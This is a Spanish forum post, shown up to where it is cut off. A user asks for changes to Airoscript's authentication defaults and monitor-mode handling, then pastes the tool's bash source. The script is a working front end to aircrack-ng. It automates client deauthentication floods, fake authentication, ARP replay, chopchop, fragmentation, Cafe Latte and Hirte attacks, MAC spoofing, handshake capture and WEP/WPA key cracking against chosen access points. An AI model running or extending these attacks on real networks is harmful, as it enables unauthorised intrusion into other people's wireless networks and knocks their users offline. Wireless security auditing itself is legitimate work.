bueno , esto tal vez te de guerra solo 5 minutos....
quiero lo siguiente.
1-cuando lanzamos un atauqe, el sistema de autentificacion por defecto es el standard , ...y por ejemplo las ralink se aogan bastante ,sin embargo he observado como en la opcion 6 o 7 no recuerdo , la de autentificar si usamos ,conservador ....todo va de cine y las ralink no se caen en la asociacion , pueden hacer fragmentacion , chop-chop y de todo.
asi que me gustaria que por defecto se usara la de conservador , y la estandar llamarla "agresiva" , eliminando la "progresiva".
2-eliminar lo de montar en monitor segun driver compat , otro driver etc ....seamos realistas
airmon-ng start
le importa un pijo el driver , por no decir que el stack compat-wireless es el standard
quiero,...
selecionar interfaz wlanx , y que la monte en monitor directamente y si eligo monx , que pase al menu de opciones sin poner en monitor obviamente.
resumido , saltarse la parte de montar en monitor, que esta fuera de lugar.
------
la parte de autentificacion ...yo directamente habia modificado y eliminado incluso el menu ese...y dejado por defecto el modo conservador , ,sin opciones de cambio , ya que aunque va mas despacito , es muchisimo mas seguro y viable.
he tenido un ralink 3070 6 horas seguidas autentificando sin caerse,,..antes no duraba ni 2 minutos con el modo standard.
te pego mi code ...aunque ya te digo , me gustaria haber conservado la opcion standard pero llamarla agresiva ya que va bastante mas a saco.
[spoiler]#! /bin/bash
# Program: Airoscript
# Version: sw2.2 beta 7
# Authors: Base Code by Daouid
# Mods & Tweaks by CurioCT and others
# Traducción y mejoras añadidas realizadas Por Chinitiw, elmanuvolador, alist3r y USUARIONUEVO para Seguridad Wireless
# Credits: Hirte, Befa, Stouf, Mister_X, ASPj , Andrea, Pilotsnipes, darkAudax, Atheros support thx to green-freq
#
# Version of aircrack-ng required: AIRCRACK-NG 1.1
# Dependencies: aircrack-ng, xterm, grep, awk, macchanger, drivers capable of injection, mdk3 (optional)
clear
## GLOBAL VARS
#Allows all xterm window to stay on screen after the operation they contain is finished
DEBUG="0"
## PATHS TO BINARIES
#CardCtl executable (on 2.4 kernels, it is cardctl)
CARDCTL="pccardctl"
#Your dhcp client utility
DHCPSOFT="dhcpcd"
## PATH TO FILES AND FOLDERS
#cracked keys will be stored here
KEYS="/root/swireless/airoscript/keys"
#The path where the captured data is stored (FOLDER MUST EXIST !)
DUMP_PATH="/root/swireless/airoscript/capturas"
# Path where ARP-forged packets are stored
ARP_PATH="/root/swireless/airoscript/capturas"
# Path to the temporary wordlist file (for WPA and WEP dictionnary attack)
WORDLIST_FOLDER="/root/swireless/airoscript/wordlist"
WORDLIST_PATH="$WORDLIST_FOLDER"/wordlist
## AIRCRACK FINE-TUNING
#This is the rate per second at wich packets will be injected
INJECTRATE="350"
#How many times the deauth attack is run
DEAUTHTIME="5"
#Time between re-association with target AP
AUTHDELAY="200"
KEEPALIVE="120"
#Fudge factor setting
FUDGEFACTOR="2"
# IP of the AP and clients to be used for CHOPCHOP and Fragmentation attack
# Host_IP and Client_IP used for arp generation from xor file (frag and chopchop)
Host_IP="192.168.1.1"
Client_IP="192.168.1.33"
# Fragmentation IP
FRAG_HOST_IP="192.168.1.1"
FRAG_CLIENT_IP="192.168.1.37"
## ---8<---8<--- DONT EDIT ANYTHING PAST THIS LINE
function menu {
target
echo "MENU PRINCIPAL"
echo " "
echo " 1) Escanear -Buscar Objetivos "
echo " 2) Seleccionar -Seleccionar Objetivo "
echo " 3) Ataques -Atacar Objetivo "
echo " 4) Auditar -Menu Auditar "
echo " 5) Auto -Buscar Key Automaticamente "
echo " 6) Desautenticar -Desautenticar del Objetivo "
echo " 7) Inyección -Menu de Inyección "
echo "
Opciones Avanzadas -Utilidades Varias "
echo " 9) Salir -Cerrar Airoscript "
echo
}
function setresolution {
echo -n Autodetectando Resolución...
detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3)
echo $detectedresolution
## A) 1024x600
## B) 1024x768
## C) 1280x768
## D) 1280x1024
## E) 1600x1200
case $detectedresolution in
"1024x600" ) resA ;;
"1024x768" ) resB ;;
"1280x768" ) resC ;;
"1366x768" ) resC ;;
"1280x1024" ) resD ;;
"1600x1200" ) resE ;;
* ) resA ;; ## fallback a una opción segura
esac
}
function resA {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 90x13+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 83x26-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 90x24+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 75x12-0-0"
TOPLEFTBIG="-geometry 91x42+0+0"
TOPRIGHTBIG="-geometry 83x26-0+0"
}
function resB {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 92x14+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 68x25-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 92x36+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 74x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 74x30-0+0"
}
function resC {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 100x20+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 109x20-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 100x30+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 109x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 109x30-0+0"
}
function resD {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 110x35+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 99x40-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 110x35+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 99x30-0-0"
TOPLEFTBIG="-geometry 110x72+0+0"
TOPRIGHTBIG="-geometry 99x40-0+0"
}
function resE {
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 130x43+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 68x25-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 130x40+0-0"
BOTTOMRIGHT="-geometry 132x35-0-0"
TOPLEFTBIG="-geometry 130x85+0+0"
TOPRIGHTBIG="-geometry 132x48-0+0"
}
function airmoncheck {
xterm -e airmon-ng check $WIFI
echo ""
optionmenu
}
function monitor_interface2 {
iwconfig $WIFI channel $Host_CHAN
}
function setinterface {
INTERFACES=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
if [ "$WIFI2" = "" ]
then
echo "Selecciona una interface: "
echo ""
select WIFI2 in $INTERFACES; do
break;
done
sleep 1
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
mode$WIFI2MODE
>&1 > /dev/null
detectarmac
info
else
foo=foo
fi
clear
menu
}
function mode {
echo "Interface no válida, elige de nuevo"
sleep 2
setinterface
}
function modeManaged {
while true; do
clear
echo "AVISO"
echo
echo " Interface en modo managed "
echo " Desea activar modo monitor? "
echo " "
echo " 1) Si (compat wireless) "
echo " 2) Si (Atheros madwifi) "
echo " 3) Si (otros drivers) "
echo " 4) No "
echo " "
echo -n " #> "
read yn
clear
case $yn in
1 ) drivers-compat ; break ;;
2 ) drivers-madwifi ; break ;;
3 ) drivers-otros ; break ;;
4 ) modeMonitor ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
}
function modeMonitor {
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'| cut -d "-" -f1`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3,$5}'| cut -d "[" -f1`
WIFI=$WIFI2
}
function drivers-compat {
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
## echo $AIROUTPUT > airoutputdebug.txt
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'| cut -d "-" -f1`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3,$5}'| cut -d "[" -f1`
tmpwifi=`echo \"$AIROUTPUT\" | awk {'print $NF'} | cut -d ")" -f1`
WIFI=$tmpwifi
}
function drivers-otros {
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
TYPE=`echo \"$AIROUTPUT\" | grep monitor | awk '{print $2}'`
DRIVER=`echo \"$AIROUTPUT\" | grep monitor| awk '{print $3}'`
WIFI=$WIFI2
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
function drivers-madwifi {
wlanconfig $WIFI2 destroy
modprobe -r ath_pci
modprobe ath_pci autocreate=monitor
WIFI=`airmon-ng | grep parent | awk '{print $1}'`
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3}'`
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
function detectarmac {
realmac=$(macchanger -s $WIFI | grep "Current" | awk '{ print $3 }')
FAKE_MAC=$realmac
}
function info {
#Modo de la interface managed/monitor
WIFIMODE=$(iwconfig $WIFI | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
# Modelo ap
Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}'`
Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | awk '{ print "("$5,$6,$7")" }'`
echo "INFO INTERFAZ"
echo
echo " Interfaz = $WIFI / modo $WIFIMODE"
echo " Chipset/Driver = $TYPE $DRIVER"
echo " Tu MAC = $FAKE_MAC"
echo
}
# This is another great contribution from CurioCT that allows you to manually enter SSID if none is set
function blankssid {
while true; do
clear
echo "SSID INCORRECTO DETECTADO"
echo
echo " Desea introducir uno nuevo "
echo " 1) Si "
echo " 2) No "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) Host_ssidinput ; break ;;
2 ) Host_SSID="" ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
# This is the input part of previous function
function Host_ssidinput {
echo " "
echo -n " Introduce el SSID >"
read Host_SSID
set -- ${Host_SSID}
clear
}
# This is the function to select Target from a list
## MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room
## And HIRTE for making all those great patch and fixing the SSID issue
function Parseforap {
clear
case $AdvancedESSIDFilter in
"" ) ;;
* ) echo -e "AVISO: Filtro de pantalla por ESSID activado. Patrón filtrado:" $AdvancedESSIDFilter;
echo -e "Puedes desactivar el filtro en Opciones Avanzadas";;
esac
ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
# averigua, dentro del CSV, a partir de que linea se acaba la lista de AP y empieza la lista de clientes conectados
head -n $ap_array $DUMP_PATH/dump-01.csv | grep -a $AdvancedESSIDFilter - &> $DUMP_PATH/dump-02.csv
# pasa a un array solo la lista de APs, desechando la de clientes
tabs -n 6
echo " Listado de APs Objetivo"
echo ""
echo -e " #\tMAC CN\t SEG\t\t PWR\t #PAQ\t SSID"
echo ""
i=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
longueur=${#MAC}
if [ $longueur -ge 17 ]; then
i=$(($i+1))
echo -e " "$i")\t"$MAC" "$CHANNEL"\t"$PRIVACY" \t"$POWER"\t"$IDLENGTH"\t"$ESSID
aidlenght=$IDLENGTH
assid[$i]="$ESSID" # estas comillas son parte de la solución al problema de los SSID con espacios.
achannel[$i]=$CHANNEL
amac[$i]=$MAC
aprivacy[$i]=$PRIVACY
aspeed[$i]=$SPEED
fi
done < $DUMP_PATH/dump-02.csv
echo ""
echo -n " Selecciona Objetivo> "
read choice
idlenght=${aidlenght[$choice]}
ssid=${assid[$choice]}
channel=${achannel[$choice]}
mac=${amac[$choice]}
privacy=${aprivacy[$choice]}
speed=${aspeed[$choice]}
Host_IDL=$idlength
Host_SPEED=$speed
Host_ENC=$privacy
Host_MAC=$mac
Host_CHAN=$channel
acouper=${#ssid}
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}
}
function choosetype {
while true; do
clear
echo "SELECCIONA MODO DE BÚSQUEDA"
echo " "
echo " 1) Sin filtros "
echo " 2) OPN "
echo " 3) WEP "
echo " 4) WPA "
echo " 5) WPA2 "
echo " 6) WPA y WPA2 "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) ENCRYPT="" ; break ;;
2 ) ENCRYPT="OPN" ; break ;;
3 ) ENCRYPT="WEP" ; break ;;
4 ) ENCRYPT="WPA1" ; break ;;
5 ) ENCRYPT="WPA2" ; break ;;
6 ) ENCRYPT="WPA" ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function SetAdvancedESSIDFilter {
clear
echo "INTRODUCE FILTRO DE DISPLAY"
echo
echo " Introduce patrón para filtrar "
echo " las redes por SSID. Ejemplos: "
echo " "
echo " * WLAN_ "
echo " * Vodafone "
echo " * ONO "
echo " * Tele2 "
echo " "
echo " (En blanco para desactivar) "
echo " "
echo " NOTA: El filtrado se aplica solo"
echo " en la pantalla de selección de "
echo " objetivo, no durante la captura "
echo " "
echo -n " Patrón >"
read AdvancedESSIDFilter
set -- ${AdvancedESSIDFilter}
clear
}
function choosescan {
while true; do
clear
echo "SELECCIONA CANAL"
echo " "
echo " 1) Todos los canales "
echo " 2) Canal(es) específico(s) "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) Scan ; break ;;
2 ) Scanchan ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function choosetarget {
while true; do
clear
echo "¿SELECCIONAR UN CLIENTE?"
echo " "
echo " 1) Si "
echo " 2) No "
echo " 3) Corregir el SSID Primero "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) askclientsel ; break ;;
2 ) break ;;
3 ) Host_ssidinput && choosetarget ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function choosedeauth {
while true; do
clear
echo "¿A QUIÉN DESAUTENTICAR?"
echo " "
echo " 1) A todos "
echo " 2) A mí mismo "
echo " 3) Al cliente seleccionado "
echo " 4) A otra dirección MAC "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) deauthall ; break ;;
2 ) deauthfake ; break ;;
3 ) deauthclient ; break ;;
4 ) inputmactodeauth ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function inputmactodeauth {
echo -n "Teclea la MAC a desautenticar del AP >"
read MANUAL_MAC2
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando a $MANUAL_MAC2 de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $MANUAL_MAC2 $WIFI &
}
function attackwep {
while true; do
clear
echo "ATAQUES SIN CLIENTES"
echo " "
echo " 1) Falsa auth => Automatica "
echo " 2) Falsa auth => Interactiva "
echo " 3) Fragmentation "
echo " 4) Chopchop "
echo " 5) Cafe Latte "
echo " 6) Hirte "
echo " "
echo "ATAQUES USANDO UN CLIENTE"
echo " "
echo " 7) ARP replay => Automatico "
echo "
ARP replay => Interactivo "
echo " 9) Fragmentation "
echo " 10) Frag. attack con cliente "
echo " 11) Chopchop "
echo " "
echo "INYECCIÓN SI SE GENERA EL XOR"
echo " "
echo " 12) ARP inject desde xor (PSK) "
echo " 13) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) attack ; break ;;
2 ) fakeinteractiveattack ; break ;;
3 ) fragnoclient ; break ;;
4 ) chopchopattack ; break ;;
5 ) cafelatteattack ; break ;;
6 ) hirteattack ; break ;;
7 ) attackclient ; break ;;
8 ) interactiveattack ; break ;;
9 ) fragmentationattack ; break ;;
10 ) fragmentationattackclient ; break ;;
11 ) chopchopattackclient ; break ;;
12 ) pskarp ; break ;;
13 ) break ;;
* ) echo "Opción desconocida. Elije de nuevo" ;;
esac
done
clear
}
function attackopn {
clear
echo " "
echo " La red seleccionada es abierta "
echo
sleep 3
clear
}
function attackunknown {
clear
echo " "
echo " La red seleccionada posee una "
echo " seguridad no implementada: $Host_ENC "
sleep 3
clear
}
function askclientsel {
while true; do
clear
echo "SELECCIONA EL CLIENTE"
echo " "
echo " 1) Clientes detectados del AP objetivo"
echo " 2) Clientes detectados de todos los APs"
echo " 3) Realizar desaut. masiva al AP objetivo + redetectar sus clientes"
echo " 4) Introducir manualmente MAC de un cliente"
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) listclients fromtarjetap; break ;;
2 ) listclients fromallaps; break ;;
3 ) clientdetectandchoose ; break ;;
4 ) clientinput ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function clientinput {
clear
echo " "
echo -n " Teclea la mac del cliente >"
read Client_MAC
set -- ${Client_MAC}
}
function listclients {
case $1 in
fromtarjetap )
echo "Listando clientes del AP objetivo..."
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC`;;
fromallaps )
echo "Listando clientes de todos los APs detectads..."
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a "0.:..:..:..:.." | awk '{ print $1 }'| grep -a -v 00:00:00:00`;;
fromclientdetection )
echo "Listando clientes del AP objetivo despues de una desautenticación masiva..."
HOST=`cat $DUMP_PATH/$Host_MAC-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -a -v $Host_MAC`;;
esac
clear
echo "SELECCIONA CLIENTE"
echo ""
select CLIENT in $HOST;
do
export Client_MAC=` echo $CLIENT | awk '{
split($1, info, "," )
print info[1] }' `
break;
done
clear
}
function cleanup {
killall -9 aireplay-ng airodump-ng > /dev/null &
ifconfig $WIFI down
airmon-ng stop $WIFI
clear
sleep 2
$CARDCTL eject
sleep 2
$CARDCTL insert
airmon-ng start $WIFI2
ifconfig $WIFI up
iwconfig $WIFI
optionmenu
}
function target {
clear
info
if [[ -z "$Host_MAC" ]]; then return; fi
Host_CHAN=$(echo $Host_CHAN | tr -d " ")
Host_SPEED=$(echo $Host_SPEED | tr -d " ")
echo "INFO AP OBJETIVO"
echo
echo " SSID = $Host_SSID /$Host_ENC"
echo " Canal = $Host_CHAN"
echo " Velocidad = $Host_SPEED Mbps"
echo " MAC del AP = $Host_MAC $Host_MAC_MODEL"
echo " MAC de cliente = $Client_MAC"
echo
}
function configure {
aircrack-ng -a 1 -b $Host_MAC -s -0 -z $DUMP_PATH/$Host_MAC-01.cap &> $DUMP_PATH/$Host_MAC.key
KEY=`cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }'`
}
function wpaconfigure {
aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST &> $DUMP_PATH/$Host_MAC.key
KEY=`cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }'`
}
function witchcrack {
if [ $Host_ENC = "WEP" ]
then
crack
else
wpacrack
fi
}
function witchattack {
if [ $Host_ENC = "WEP" ]
then
monitor_interface2
attackwep
elif [ $Host_ENC = "WPA2" ]
then
monitor_interface2
wpahandshake
elif [ $Host_ENC = "WPA" ]
then
monitor_interface2
wpahandshake
elif [ $Host_ENC = "WPA2WPA" ]
then
monitor_interface2
wpahandshake
elif [ $Host_ENC = "OPN" ]
then
attackopn
else
attackunknown
fi
}
function wichchangemac {
while true; do
clear
echo " "
echo " Cambiar la MAC... "
echo " "
echo " 1) Por una aleatoria "
echo " 2) Por cliente seleccionado "
echo " 3) Introducir MAC "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) randommacchanger ; break ;;
2 ) clientmacchanger ; break ;;
3 ) inputmacchanger ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function randommacchanger {
ifconfig $WIFI down
macchanger -r $WIFI
sleep 2
ifconfig $WIFI up
detectarmac
clear
menu
}
function clientmacchanger {
ifconfig $WIFI down
macchanger -m $Client_MAC $WIFI
sleep 2
ifconfig $WIFI up
detectarmac
clear
menu
}
function inputmacchanger {
echo -n "Teclea la nueva MAC: "
read MANUAL_MAC
echo""
echo Su Nueva MAC es: $MANUAL_MAC
echo""
ifconfig $WIFI down
macchanger -m $MANUAL_MAC $WIFI
sleep 2
ifconfig $WIFI up
detectarmac
clear
menu
}
function witchconfigure {
if [ $Host_ENC = "WEP" ]
then
configure
else
wpaconfigure
fi
}
function crackptw {
xterm -hold -title "Aircrack PTW contra $Host_SSID" $TOPRIGHTBIG -e aircrack-ng -z -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
menu
}
function crackstd {
xterm -hold -title "Aircrack contra $Host_SSID" $TOPRIGHTBIG -e aircrack-ng -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
menu
}
function crackman {
echo -n "tipo de fudge factor"
read FUDGE_FACTOR
echo You typed: $FUDGE_FACTOR
set -- ${FUDGE_FACTOR}
echo -n "tamaño de clave en bits? 64,128 etc... >"
read ENC_SIZE
echo You typed: $ENC_SIZE
set -- ${ENC_SIZE}
xterm -hold -title "Manual cracking: $Host_SSID" $TOPRIGHTBIG -e aircrack-ng -a 1 -b $Host_MAC -f $FUDGE_FACTOR -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
menu
}
function crack {
while true; do
clear
echo " "
echo " Opciones WEP CRACKING "
echo " "
echo " 1) aircrack-ng PTW "
echo " 2) aircrack-ng Estandard "
echo " 3) aircrack-ng Opciones User "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) crackptw ; break ;;
2 ) crackstd ; break ;;
3 ) crackman ; break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function wpahandshake {
clear
rm -rf $DUMP_PATH/$Host_MAC*
xterm $HOLD -title "Esperando Handshake de $Host_SSID" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng --channel $Host_CHAN --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC $WIFI &
sleep 2
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando $Client_MAC de $Host_SSID" -e aireplay-ng --deauth 10 -a $Host_MAC -c $Client_MAC $WIFI &
clear
}
function wpacrack {
echo -n "Teclee la ruta del diccionario que desea usar: "
read WORDLISTMANUAL
xterm -hold $TOPRIGHT -title "Aircracking: $Host_SSID" -e aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLISTMANUAL -l "$KEYS/$Host_SSID.txt" &
}
# aircrack command -w
function wlcrack {
xterm $HOLD $TOPRIGHT -title "Aircracking: $Host_SSID" -hold -e aircrack-ng -K -w "$WORDLIST_PATH" -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/*.cap -l "$KEYS/$Host_SSID.txt" &
}
function Scan {
clear
rm -rf $DUMP_PATH/dump*
xterm $HOLD -title "Escaneando Objetivos ..." $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $DUMP_PATH/dump --encrypt $ENCRYPT -a $WIFI
}
function Scanchan {
clear
echo " "
echo " Selecciona Canal de busqueda "
echo " "
echo " Un solo canal 6 "
echo " rango de canales 1-5 "
echo " Multiples canales 1,2,5-7,11 "
echo " "
echo -n " #> "
read channel_number
echo You typed: $channel_number
set -- ${channel_number}
clear
rm -rf $DUMP_PATH/dump*
xterm $HOLD -title "Escaneando Objetivos en el canal --> $channel_number" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $DUMP_PATH/dump --channel "$channel_number" --encrypt $ENCRYPT -a $WIFI
}
function capture {
clear
rm -rf $DUMP_PATH/$Host_MAC*
xterm $HOLD -title "Capturando datos en el canal --> $Host_CHAN" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN -a $WIFI
}
function deauthall {
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando a todos de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC $WIFI &
}
function deauthclient {
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando $Client_MAC de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI &
}
function deauthfake {
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando $FAKE_MAC de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI &
}
function fakeauth3 {
xterm $HOLD -title "Asociando Con $Host_SSID " $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -e aireplay-ng --fakeauth 6000 -o 1 -q 10 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $WIFI &
}
function clientdetectandchoose {
iwconfig $WIFI channel $Host_CHAN
capture & deauthall
while true; do
clear
echo "¿SE ENCONTRÓ EL CLIENTE?"
echo " "
echo " 1) Si"
echo " 2) No"
echo " "
echo -n ' #> '
read yn
case $yn in
1 ) listclients fromclientdetection; break ;;
2 ) break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function attack {
capture & xterm $HOLD -title "Inyeccion: Host: $Host_MAC" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng "$WIFI" --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 -h $FAKE_MAC -x $INJECTRATE & fakeauth3 &
sleep 2
clear
}
function attackclient {
capture & xterm $HOLD -title "Inyeccion: Host: $Host_MAC CLient: $Client_MAC" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng $WIFI --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 -h $Client_MAC -x $INJECTRATE &
sleep 2
clear
}
function interactiveattack {
capture & xterm $HOLD -title "Selección Packet interactiva en Host: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b $Host_MAC $Client_MAC -x $INJECTRATE &
sleep 2
clear
}
function fakeinteractiveattack {
capture & xterm $HOLD -title "Selección Packet interactiva en Host: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE & fakeauth3 &
sleep 2
clear
}
function cafelatteattack {
capture & xterm $HOLD -title "Ataque Cafe Latte en: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng -6 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI & fakeauth3 &
sleep 2
clear
}
function hirteattack {
capture & xterm $HOLD -title "Ataque Hirte en: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e aireplay-ng -7 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI & fakeauth3 &
sleep 2
clear
}
function chopchopattack {
clear
rm -rf $DUMP_PATH/$Host_MAC*
rm -rf replay_dec-*.xor
capture & fakeauth3 & xterm -hold -title "Ataque ChopChop a $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -e aireplay-ng --chopchop -b $Host_MAC -h $FAKE_MAC $WIFI &
sleep 2
clear
injectmenu
}
function chopchopattackclient {
clear
rm -rf $DUMP_PATH/$Host_MAC*
rm -rf replay_dec-*.xor
capture & xterm -hold -title "Ataque ChopChop a $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -e aireplay-ng --chopchop -h $Client_MAC $WIFI &
sleep 2
clear
injectmenu
}
function chopchopend {
rm -rf $DUMP_PATH/chopchop_$Host_MAC*
packetforge-ng -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "Enviando chopchop a $Host_SSID" -e aireplay-ng --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap -h $FAKE_MAC -x $INJECTRATE $WIFI &
sleep 2
clear
}
function chopchopclientend {
rm -rf $DUMP_PATH/chopchop_$Host_MAC*
packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "Enviando chopchop a $Host_SSID" -e aireplay-ng --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $WIFI &
sleep 2
clear
}
function fragnoclient {
rm -rf fragment-*.xor
rm -rf $DUMP_PATH/frag_*.cap
rm -rf $DUMP_PATH/$Host_MAC*
killall -9 airodump-ng aireplay-ng
